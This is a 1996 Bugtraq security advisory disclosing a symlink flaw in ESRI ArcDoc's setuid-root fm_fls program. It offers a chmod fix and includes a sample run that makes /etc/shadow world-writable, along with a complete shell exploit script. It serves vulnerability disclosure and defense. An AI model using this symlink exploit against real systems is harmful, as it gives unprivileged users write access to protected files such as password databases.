[2603] in bugtraq
Security problem in ESRI's ArcDoc 7.0.4
daemon@ATHENA.MIT.EDU (James W. Abendschan)
Fri May 24 02:16:03 1996
Date: Thu, 23 May 1996 21:21:46 -0700
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: "James W. Abendschan" <jwa@nbs.nau.edu>
X-To: bugtraq@crimelab.com, unix-admin@lists.nau.edu, support@esri.com,
cert@cert.org
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
*** GIS & ESRI/ARC/Info shops take note! ***
The program "fm_fls" as distributed with ESRI's "ArcDoc" package (7.0.4)
contains a bug which allows us to (a) add somewhat arbitrary data
to any file and (b) changes the permissions of that file to rw-rw-rw-.
fm_fls is setuid root.
When fm_fls is executed, it opens up a logfile -- the default location
for this file is /tmp/fm_fls.log. Unfortunately, it doesn't
check if this file already exists or if this file has any symlinks
attached to it. If for some reason fm_fls gets bad arguments, it
will write these bad arguments to the logfile, chown the file to
root, give the file 666 permissions, and exit.
If we make a link from this file to an unreadable file, we
can both append the contents of the logfile into the unreadable
file and gain world rw access to the file.
Sample run:
> ecosys:~jwa/Security/Projects/r00tin> id
> uid=200(jwa) gid=107(cpin)
> ecosys:~jwa/Security/Projects/r00tin> ls -l /etc/shadow
> -rw------- 1 root other 1851 May 23 20:22 /etc/shadow
> ecosys:~jwa/Security/Projects/r00tin> fm.sploit /etc/shadow
> /nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls: Error. Unable to open License File woot
> fm.sploit of /etc/shadow yields:
> -rw-rw-rw- 1 root other 2011 May 23 20:38 /etc/shadow
> ecosys:~jwa/Security/Projects/r00tin> tail -5 /etc/shadow
> mpm:xxxxxxxxxxxxx:6445::::::
> ebp:xxxxxxxxxxxxx:6445::::::
> sml:xxxxxxxxxxxxx:6445::::::
> 1996/05/23-20:38:32 BG woot ecosys
> # 1996/05/23-20:38:32 /nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls: Error. Unable to open License File woot
> ecosys:~jwa/Security/Projects/r00tin>
Note the additional lines appended to the target file (in this case,
/etc/shadow.)
To fix this, either (a) yell at your vendor or (b) chmod 555 `which fm_fls`.
I don't yet know the effects of removing the suid bit on fm_fls; I'd
like to hear feedback on this. I've seen fm_fls distributed with
other applications -- perhaps the bug is not specific to ARC/Info?
Comments are welcome.
James
#!/bin/sh
#
# exploit a bug in the fm_fls application as distributed with ARC/Info's
# ArcDoc (and others?) to give us rw access to any file.
#
# fix: chmod 555 `which fm_fls`
#
# tested on Solaris 2.5 w/ ArcDoc 7.0.4
#
# James Abendschan jwa@nbs.nau.edu 23 May 1996
#
# full path to the fm_fls executable
FM_FLS="/nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls"
LOGFILE=/tmp/fm_fls.log
TMP=/tmp/exploit.$$
UNREADABLE=$1
if [ $# != 1 ]
then
echo "usage: `basename $0` filename"
exit 1
fi
rm -f $LOGFILE
if [ -f $LOGFILE ]
then
echo "tried to remove $LOGFILE, but it still exists! Exploit won't work."
exit 1
fi
# since fm_fls will complain if we link to a logfile too "far away"
# from the original file, we just do a dual link..
ln -s $UNREADABLE $TMP
ln -s $TMP $LOGFILE
$FM_FLS woot
echo "`basename $0` of $UNREADABLE yields:"
ls -l $UNREADABLE
# all done, clean up.
rm -f $TMP $LOGFILE
exit 0
--
James W. Abendschan Email: jwa@nbs.nau.edu
UNIX Systems Programmer/Administrator Phone: (520) 556-7466 x238
Colorado Plateau Research Station, Flagstaff, AZ Voice mail: *516
